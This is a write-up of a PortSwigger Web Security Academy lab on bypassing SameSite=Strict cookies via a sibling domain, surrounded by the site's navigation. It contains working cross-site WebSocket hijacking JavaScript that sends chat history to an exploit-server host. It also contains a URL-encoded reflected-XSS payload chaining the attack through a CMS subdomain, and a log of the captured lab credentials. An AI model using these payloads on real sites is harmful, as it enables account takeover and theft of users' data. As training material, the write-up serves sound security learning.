โณ
Ichyaboy
  • ๐Ÿ‘‹Ichyaboy
  • Hackthebox Related
    • ๐ŸŽฐMachines
      • Linux based Machines
        • Talkative
        • Encoding
      • Windows based machines
        • Silo
    • ๐Ÿ•น๏ธChallenges (coming soon)
  • Portswigger Related
    • ๐Ÿ”งServer-side topics
      • Business logic flaws
        • Excessive trust in client-side controls
        • 2FA Broken Logic
        • High-level logic vulnerability
        • Inconsistent handling of exceptional input
        • Inconsistent security controls
        • Weak isolation on dual-use endpoint
        • Low-level logic flaw
        • Infinite money logic flaw
      • Information Disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
      • Access Control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User role can be modified in user profile
        • User ID controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with data leakage in redirect
        • User ID controlled by request parameter with password disclosure
        • Insecure direct object references
        • URL-based access control can be circumvented
        • Method-based access control can be circumvented
        • Multi-step process with no access control on one step
        • Referer-based access control
      • File Upload
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
        • Web shell upload via path traversal
        • Web shell upload via extension blacklist bypass
        • Web shell upload via obfuscated file extension
        • Remote code execution via polyglot web shell upload
        • Web shell upload via race condition
      • Race Conditions
        • Limit overrun race conditions
        • Bypassing rate limits via race conditions
        • Multi endpoint race conditions
        • Single endpoint race conditions
        • Time sensitive vulnerabilities
        • Partial construction race conditions
      • SSRF
        • Basic SSRF against the local server
        • Basic SSRF against another back end system
        • Blind SSRF with out of band detection
        • SSRF with blacklist based input filter
        • SSRF with filter bypass via open redirection vulnerability
        • Blind SSRF with Shellshock exploitation
        • SSRF with whitelist based input filter
      • XXE Injection
        • Exploiting XXE using external entities to retrieve files
        • Exploiting XXE to perform SSRF attacks
        • Blind XXE with out of band interaction
        • Blind XXE with out of band interaction via XML parameter entities
        • Exploiting blind XXE to exfiltrate data using a malicious external DTD
        • Exploiting blind XXE to retrieve data via error messages
        • Exploiting XInclude to retrieve files
        • Exploiting XXE via image file upload
        • Exploiting XXE to retrieve data by repurposing a local DTD
      • Nosql Injection
        • Detecting NoSQL injection
        • Exploiting NoSQL operator injection to bypass authentication
        • Exploiting NoSQL injection to extract data
        • Exploiting NoSQL operator injection to extract unknown fields
      • Api Testing
        • Exploiting an API endpoint using documentation
        • Exploiting server side parameter pollution in a query string
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
        • Exploiting server side parameter pollution in a REST URL
    • ๐ŸŽฏClient-side topics
      • Cross-site scripting (XSS)
        • Stored XSS
          • Stored XSS into HTML context with nothing encoded
          • Stored XSS into anchor href attribute with double quotes HTML encoded
          • Stored XSS into onclick event with angle brackets and double quotes HTML encoded and single quotes and backslash escaped
        • Reflected XSS
          • Reflected XSS into HTML context with nothing encoded
          • Reflected XSS into attribute with angle brackets HTML encoded
          • Reflected XSS into a JavaScript string with angle brackets HTML encoded
          • Reflected XSS into HTML context with most tags and attributes blocked
          • Reflected XSS into HTML context with all tags blocked except custom ones
          • Reflected XSS with some SVG markup allowed
          • Reflected XSS in canonical link tag
          • Reflected XSS into a JavaScript string with single quote and backslash escaped
          • Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped
          • Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
          • Reflected XSS with event handlers and href attributes blocked
          • Reflected XSS in a JavaScript URL with some characters blocked
        • DOM-based XSS
          • DOM XSS in document.write sink using source location.search
          • DOM XSS in innerHTML sink using source location.search
          • DOM XSS in jQuery anchor href attribute sink using location.search source
          • DOM XSS in jQuery selector sink using a hashchange event
          • DOM XSS in document.write sink using source location.search inside a select element
          • DOM XSS in AngularJS expression with angle brackets and double quotes HTML encoded
          • Reflected DOM XSS
          • Stored DOM XSS
        • CSP Bypass
          • Reflected XSS protected by CSP, with CSP bypass
          • Reflected XSS protected by very strict CSP, with dangling markup attack
        • Client-side template injection
          • Reflected XSS with AngularJS sandbox escape without strings
          • Reflected XSS with AngularJS sandbox escape and CSP
        • Common XSS Attacks
          • Exploiting cross site scripting to steal cookies
          • Exploiting cross site scripting to capture passwords
          • Exploiting XSS to perform CSRF
      • WebSockets
        • Manipulating WebSocket messages to exploit vulnerabilities
        • Cross site WebSocket hijacking
        • Manipulating the WebSocket handshake to exploit vulnerabilities
      • Cross-site Request forgery (CSRF)
        • CSRF vulnerability with no defenses
        • CSRF where token validation depends on request method
        • CSRF where token validation depends on token being present
        • CSRF where token is not tied to user session
        • CSRF where token is tied to non session cookie
        • CSRF where token is duplicated in cookie
        • SameSite Lax bypass via method override
        • SameSite Strict bypass via client side redirect
        • SameSite Strict bypass via sibling domain
        • SameSite Lax bypass via cookie refresh
        • CSRF where Referer validation depends on header being present
        • CSRF with broken Referer validation
      • Cross-origin resource sharing
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Clickjacking
        • Basic clickjacking with CSRF token protection
        • Clickjacking with form input data prefilled from a URL parameter
        • Clickjacking with a frame buster script
        • Exploiting clickjacking vulnerability to trigger DOM based XSS
        • Multistep clickjacking
      • DOM-based vulnerabilities
        • DOM XSS using web messages
        • DOM XSS using web messages and a JavaScript URL
        • DOM XSS using web messages and JSON.parse
        • DOM based open redirection
        • DOM based cookie manipulation
        • Exploiting DOM clobbering to enable XSS
        • Clobbering DOM attributes to bypass HTML filters
  • Resources
    • ๐Ÿณ๏ธCheatsheets
      • Basic Tools
      • Footprinting
      • Web Inofrmation Gathering
      • Nmap
      • File Transfer
      • Passwords Attacks
      • USING THE METASPLOIT FRAMEWORK
      • Shells & Payloads
      • Attacking Common Services
      • Pivoting, Tunneling, and Port Forwarding
    • ๐ŸดUseful Scripts
      • NoSQL REGEX Password Length
      • NoSQL REGEX Password
      • Creds BruteForce CSRF Handling
Powered by GitBook
On this page
  • Description
  • Approach
  1. Portswigger Related
  2. Client-side topics
  3. Cross-site Request forgery (CSRF)

SameSite Strict bypass via sibling domain

PreviousSameSite Strict bypass via client side redirectNextSameSite Lax bypass via cookie refresh

Description

This lab's live chat feature is vulnerable to (). To solve the lab, log in to the victim's account.

To do this, use the provided exploit server to perform a CSWSH attack that exfiltrates the victim's chat history to the default Burp Collaborator server. The chat history contains the login credentials in plain text.

If you haven't done so already, we recommend completing our topic on before attempting this lab.

Approach

After accessing the lab, I went straight to the chat page while proxying my requests through Burp Suite. In the HTTP history, I saw an interesting request pointing to a JavaScript file:

GET /resources/js/chat.js HTTP/2
Host: 0ad4007903f8d8e98161768200ba008b.web-security-academy.net
Cookie: session=mRalVx3cATzBc9BXw2TvRVAPa2lUEEfs
...

Two things stood out in the response:

  1. Access-Control-Allow-Origin header: This header pointed to another domain, https://cms-0ad4007903f8d8e98161768200ba008b.web-security-academy.net.

  2. function openWebSocket(): This function indicated the presence of WebSockets, suggesting that the live chat functionality is WebSocket-based.

I decided to check the WebSocket history in Burp Suite to see if I could find anything interesting. I discovered that sending the READY command to the WebSocket server would respond with the full chat history, providing a way to retrieve the victim's chat history.

Next, I wrote a simple exploit and hosted it on my exploit server. This script, when visited by the victim, would start a WebSocket connection with the chat server, send the READY command, and then send the received data to my exploit server.

Here is the script:

<script>
    var ws = new WebSocket('wss:/0ad4007903f8d8e98161768200ba008b.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://exploit-0a8b00510305d891817c750d01480033.exploit-server.net/exploit?recieved_data='+btoa(event.data));
    };
</script>

After storing this script and delivering it to the victim, I checked the logs on my exploit server and found a request with base64 encoded data:

GET /exploit?recieved_data=eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9

Decoding this data in Burp's decoder revealed:

{"user":"CONNECTED","content":"-- Now chatting with Hal Pline --"}

This indicated the start of the WebSocket connection but no chat history. I realized the victim's cookie did not get through to the chat endpoint due to the SameSite=Strict attribute, which prevents cookies from being sent in cross-site requests.

To bypass this restriction, I utilized the domain found in the Access-Control-Allow-Origin header. The lab URL was:

https://0ad4007903f8d8e98161768200ba008b.web-security-academy.net/chat

The CMS URL was:

https://cms-0ad4007903f8d8e98161768200ba008b.web-security-academy.net

These URLs have different origins but the same site, web-security-academy.net. This allows for cross-site WebSocket hijacking.

Visiting the CMS URL, I found a login form that reflected the username in a paragraph tag:

<p>Invalid username: ichyaboy</p>

Testing with a simple XSS payload (<script>alert(1)</script>), I confirmed it worked, even though the form sent a POST request. By changing the method to GET, I ensured the exploit could work.

Hereโ€™s the crafted exploit payload:

<script>
    document.location = "https://cms-0ad4007903f8d8e98161768200ba008b.web-security-academy.net/login?username=<script>
    var ws = new WebSocket('wss:/0ad4007903f8d8e98161768200ba008b.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://exploit-0a8b00510305d891817c750d01480033.exploit-server.net/exploit?recieved_data='+btoa(event.data));
    };
</script>&password=Welcome2024";
</script>

Of course i need to URL encode my script so it doesn't create any errors, so my final payload should be:

<script>
    document.location = "https://cms-0ad4007903f8d8e98161768200ba008b.web-security-academy.net/login?username=%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%76%61%72%20%77%73%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%30%61%64%34%30%30%37%39%30%33%66%38%64%38%65%39%38%31%36%31%37%36%38%32%30%30%62%61%30%30%38%62%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27%29%3b%0a%20%20%20%20%77%73%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%0a%20%20%20%20%20%20%20%20%77%73%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%20%20%20%20%7d%3b%0a%20%20%20%20%77%73%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%20%7b%0a%20%20%20%20%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%38%62%30%30%35%31%30%33%30%35%64%38%39%31%38%31%37%63%37%35%30%64%30%31%34%38%30%30%33%33%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%72%65%63%69%65%76%65%64%5f%64%61%74%61%3d%27%2b%62%74%6f%61%28%65%76%65%6e%74%2e%64%61%74%61%29%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&password=Welcome2024";
</script>

After pasting this script into my exploit server and delivering it to the victim, I checked my exploit server logs and found these requests:

GET /exploit?recieved_data=eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6IkhlbGxvLCBob3cgY2FuIEkgaGVscD8ifQ== 
GET /exploit?recieved_data=eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IkkgZm9yZ290IG15IHBhc3N3b3JkIn0= 
GET /exploit?recieved_data=eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6Ik5vIHByb2JsZW0gY2FybG9zLCBpdCZhcG9zO3MgZ3RzMmR5cWRvODRkcWJ1Znh2OHAifQ== 
GET /exploit?recieved_data=eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IlRoYW5rcywgSSBob3BlIHRoaXMgZG9lc24mYXBvczt0IGNvbWUgYmFjayB0byBiaXRlIG1lISJ9 
GET /exploit?recieved_data=eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9

Decoding these data in Burp's decoder revealed the full chat history of Carlos:

{"user":"Hal Pline","content":"Hello, how can I help?"} 
{"user":"You","content":"I forgot my password"} 
{"user":"Hal Pline","content":"No problem carlos, it&apos;s gts2dyqdo84dqbufxv8p"} 
{"user":"You","content":"Thanks, I hope this doesn&apos;t come back to bite me!"} 
{"user":"CONNECTED","content":"-- Now chatting with Hal Pline --"}

I could clearly see Carlos's password. By simply logging in with that password as the Carlos user, the lab was solved.

๐ŸŽฏ
cross-site WebSocket hijacking
CSWSH
WebSocket vulnerabilities